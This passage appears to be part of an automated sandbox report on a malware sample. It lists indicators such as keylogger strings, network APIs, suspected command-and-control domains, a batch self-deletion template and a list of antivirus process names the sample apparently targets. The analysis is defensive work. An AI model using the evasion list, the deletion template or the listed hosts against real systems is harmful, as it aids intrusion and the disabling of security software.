"https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-517", "type": 2, "relevance": 1, "name": "Contains ability to enumerate running processes using Tasklist", "description": "Observed string: \"tasklist.exe\" [Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16]\n Observed string: \"tasklist.exe\" [Source: 00000000-00004816.00000000.139125.001D0000.00000004.mdmp\n 00000000-00004816.00000000.139125.0041B000.00000080.mdmp]", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-556", "type": 2, "relevance": 1, "name": "Found strings related to keylogger", "description": "Found string \"[BACK]\" (Indicator: \"[Back]\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"[TAB]\" (Indicator: \"[tab]\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"[BACK]\" (Indicator: \"[Back]\"; Source: \"00000000-00004816.00000000.139125.00423000.00000040.mdmp\")\n Found string \"[TAB]\" (Indicator: \"[tab]\"; Source: \"00000000-00004816.00000000.139125.00423000.00000040.mdmp\")\n Found string \"[BACK]\" (Indicator: \"[Back]\"; Source: \"00000000-00005072.00000000.139289.00423000.00000040.mdmp\")\n Found string \"[TAB]\" (Indicator: \"[tab]\"; Source: \"00000000-00005072.00000000.139289.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-88", "relevance": 1, "name": "Imports GetCommandLine API", "description": "Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16]\n Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: dlldsk32.exe]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-210", "type": 2, "relevance": 1, "name": "Contains ability to create/connect to a named pipe (API string)", "description": "Found reference to API \"CreatePipe\" (Indicator: \"CreatePipe\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"PeekNamedPipe\" (Indicator: \"PeekNamedPipe\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"CreatePipe\" (Indicator: \"CreatePipe\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"PeekNamedPipe\" (Indicator: \"PeekNamedPipe\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-537", "type": 2, "relevance": 1, "name": "Contains ability to create a new HTTP request (API string)", "description": "Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-228", "type": 2, "relevance": 1, "name": "Contains ability to communicate with C2 using Sockets (API string)", "description": "Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")", "origin": "File/Memory", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"irc.quakenet.org\"\n Heuristic match: \"us.quakenet.org\"\n Heuristic match: \"hwinfoq.com\"\n Heuristic match: \"dogz.mooo.com\"\n Heuristic match: \"evil.mooo.com\"\n Heuristic match: \"fli4l.mooo.com\"\n Heuristic match: \"tippspiel.mooo.com\"\n Heuristic match: \"bullock.mooo.com\"\n Heuristic match: \"666.afraid.org\"\n Heuristic match: \"nightwish.afraid.org\"\n Heuristic match: \"foenix.afraid.org\"\n Heuristic match: \"i.am.not.afraid.org\"\n Heuristic match: \"be.very.afraid.org\"\n Heuristic match: \"nin.afraid.org\"\n Heuristic match: \"codebytesdev.afraid.org\"\n Heuristic match: \"rizahnst.afraid.org\"\n Heuristic match: \"lwser.mooo.com\"\n Heuristic match: \"franck78.afraid.org\"\n Heuristic match: \"eventhorizon.no-ip.org\"\n Heuristic match: \"gacw.no-ip.org\"\n Heuristic match: \"kylodee.afraid.org\"\n Heuristic match: \"janning.no-ip.org\"\n Heuristic match: \":irc.afraid.org\"\n Heuristic match: \"co.uk\"\n Heuristic match: \"windowsupdate.com\"\n Pattern match: \"www.windowsupdate.com\"\n Heuristic match: \"v5windowsupdate.microsoft.nsatc.net\"\n Pattern match: \"www3.ca.com\"\n Pattern match: \"www.ravantivirus.com\"\n Pattern match: \"www.bitdefender.com\"\n Pattern match: \"www.pandasoftware.com\"\n Heuristic match: \"housecall.trendmicro.com\"\n Pattern match: \"www.trendmicro.com\"\n Heuristic match: \"trendmicro.com\"\n Pattern match: \"www.nai.com\"\n Heuristic match: \"nai.com\"\n Heuristic match: \"secure.nai.com\"\n Pattern match: \"www.my-etrust.com\"\n Heuristic match: \"my-etrust.com\"\n Heuristic match: \"ca.com\"\n Pattern match: \"www.ca.com\"\n Heuristic match: \"networkassociates.com\"\n Pattern match: \"www.networkassociates.com\"\n Heuristic match: \"avp.com\"\n Pattern match: \"www.kaspersky.com\"\n Pattern match: \"www.avp.com\"\n Heuristic match: \"kaspersky.com\"\n Pattern match: \"www.f-secure.com\"\n Heuristic match: \"f-secure.com\"\n Heuristic match: \"viruslist.com\"\n Pattern match: \"www.viruslist.com\"\n Heuristic match: \"sophos.com\"\n Pattern match: \"www.sophos.com\"\n Heuristic match: \"us.mcafee.com\"\n Heuristic match: \"mcafee.com\"\n Pattern match: \"www.mcafee.com\"\n Heuristic match: \"symantec.com\"\n Heuristic match: \"securityresponse.symantec.com\"\n Pattern match: \"www.symantec.com\"\n Heuristic match: \".co.uk\"\n Heuristic match: \"yahoo.com\"\n Heuristic match: \"aol.com\"\n Heuristic match: \"mail.com\"\n Heuristic match: \"hotmail.com\"\n Heuristic match: \"t.com\"\n Heuristic match: \"cero.rs\"\n Heuristic match: \"chcp.com\"\n Heuristic match: \"command.com\"\n Heuristic match: \"diskcomp.com\"\n Heuristic match: \"diskcopy.com\"\n Heuristic match: \"edit.com\"\n Heuristic match: \"esrb.rs\"\n Heuristic match: \"fpb.rs\"\n Heuristic match: \"grb.rs\"\n Heuristic match: \"ksxbar.ax\"\n Heuristic match: \"ksproxy.ax\"\n Heuristic match: \"kstvtune.ax\"\n Heuristic match: \"kswdmcap.ax\"\n Heuristic match: \"loadfix.com\"\n Heuristic match: \"mpeg2data.ax\"\n Heuristic match: \"mpg2splt.ax\"\n Heuristic match: \"mode.com\"\n Heuristic match: \"more.com\"\n Heuristic match: \"msnp.ax\"\n Heuristic match: \"msdvbnp.ax\"\n Heuristic match: \"oflc.rs\"\n Heuristic match: \"pegi.rs\"\n Heuristic match: \"pegi-fi.rs\"\n Heuristic match: \"pegi-pt.rs\"\n Heuristic match: \"pegibbfc.rs\"\n Heuristic match: \"psisrndr.ax\"\n Heuristic match: \"tree.com\"\n Heuristic match: \"usk.rs\"\n Heuristic match: \"vidcap.ax\"\n Heuristic match: \"web.rs\"\n Heuristic match: \"win.com\"\n Heuristic match: \"vbicodec.ax\"\n Heuristic match: \"vbisurf.ax\"\n Heuristic match: \"wstpager.ax\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-539", "type": 2, "relevance": 1, "name": "Contains reference to Windows internet services (API string)", "description": "Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-419", "type": 2, "relevance": 1, "name": "Contains ability to open a port and listen for incoming connection (API string)", "description": "Found reference to API \"setsockopt\" (Indicator: \"setsockopt\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")", "origin": "File/Memory", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-241", "type": 2, "relevance": 1, "name": "Contains ability to download a file from a URL (API string)", "description": "Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-538", "type": 2, "relevance": 1, "name": "Contains ability to create a HTTP or FTP session (API string)", "description": "Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-457", "type": 2, "relevance": 1, "name": "Found string related to HTTP headers", "description": "Found string \"%s %s HTTP/1.1Referer: %sHost: %sConnection: close\" (Indicator: \"HTTP/1.1\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"%s %s HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-408", "type": 2, "relevance": 1, "name": "Contains ability to delete files", "description": "Observed string: \"@echo off%s > \"%s\"del \"%s\"\" (Indicator: \"\"del \") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n Observed string: \"@echo off%s > \"%s\"del \"%s\"del \"%s\"\" (Indicator: \"\"del \") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\drivers\\etc\\hosts\" (Indicator: \"\\drivers\\\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"\\drivers\\etc\\hosts\" (Indicator: \"\\drivers\\\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found string \"\\Windows\\System32\\DriverStore\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00004816.00000001.139308.001D0000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infstor.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00004816.00000001.139308.001D0000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infstrng.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00004816.00000001.139308.001D0000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\drvindex.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00004816.00000001.139308.001D0000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\FileRepository\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00004816.00000001.139308.001D0000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infpub.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00004816.00000001.139308.0026A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-230", "type": 2, "relevance": 1, "name": "Contains ability to delete registry key/value (API string)", "description": "Found reference to API \"RegDeleteKeyA\" (Indicator: \"RegDeleteKey\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"RegDeleteValueA\" (Indicator: \"RegDeleteValue\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"RegDeleteKeyA\" (Indicator: \"RegDeleteKey\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"RegDeleteValueA\" (Indicator: \"RegDeleteValue\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-77", "type": 2, "relevance": 1, "name": "Contains ability to modify access token privileges (API string)", "description": "Found reference to API \"LookupPrivilegeValueA\" (Indicator: \"LookupPrivilegeValue\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"AdjustTokenPrivileges\" (Indicator: \"AdjustTokenPrivileges\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"SeDebugPrivilege\" (Indicator: \"SeDebugPrivilege\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"SeDebugPrivilege\" (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00004816.00000000.139125.00423000.00000040.mdmp\")\n Found reference to API \"LookupPrivilegeValueA\" (Indicator: \"LookupPrivilegeValue\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"AdjustTokenPrivileges\" (Indicator: \"AdjustTokenPrivileges\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"SeDebugPrivilege\" (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00005072.00000000.139289.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"RemoveDirectoryA\" (Indicator: \"RemoveDirectory\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"RemoveDirectoryA\" (Indicator: \"RemoveDirectory\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-134", "type": 2, "relevance": 3, "name": "Found anti-virus related strings names", "description": "Found string \"SymProxySvc\" (Indicator: \"symproxysvc\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"Norton Antivirus Server\" (Indicator: \"norton\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"NISUM\" (Indicator: \"nisum\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"NISSERV\" (Indicator: \"nisserv\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"navapsvc\" (Indicator: \"navapsvc\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"McShield\" (Indicator: \"mcshield\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"DefWatch\" (Indicator: \"defwatch\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"ccEvtMgr\" (Indicator: \"ccevtmgr\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"BlackICE\" (Indicator: \"blackice\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"AvSynMgr\" (Indicator: \"avsynmgr\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"AVPCC\" (Indicator: \"avpcc\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"AvgServ\" (Indicator: \"avgserv\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"persfw.exe\" (Indicator: \"persfw\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"NMain.exe\" (Indicator: \"nmain\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"NAVW32.exe\" (Indicator: \"navw32\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"NISUM.EXE\" (Indicator: \"nisum\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"NAVAPSVC.EXE\" (Indicator: \"navapsvc\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"Mpftray.exe\" (Indicator: \"mpftray\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"McShield.exe\" (Indicator: \"mcshield\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"LOCKDOWN2000.EXE\" (Indicator: \"lockdown2000\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"IAMSERV.EXE\" (Indicator: \"iamserv\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"IAMAPP.EXE\" (Indicator: \"iamapp\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"CCSETMGR.EXE\" (Indicator: \"ccsetmgr\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"ccEvtMgr.exe\" (Indicator: \"ccevtmgr\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"avpcc.exe\" (Indicator: \"avpcc\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"avgserv.exe\" (Indicator: \"avgserv\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"avgcc32.exe\" (Indicator: \"avgcc\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"avgcc32.exe\" (Indicator: \"avgcc32\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"apvxdwin.exe\" (Indicator: \"apvxdwin\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"Lookout.exe\" (Indicator: \"lookout\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")", "origin": "File/Memory", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-406", "type": 2, "relevance": 1, "name": "Contains ability to shutdown system", "description": "Observed string: \"shutdown\" (Indicator: \"shutdown\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n Observed string: \"shutdown\" (Indicator: \"shutdown\") in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"TRANSPORTS\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP6\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n 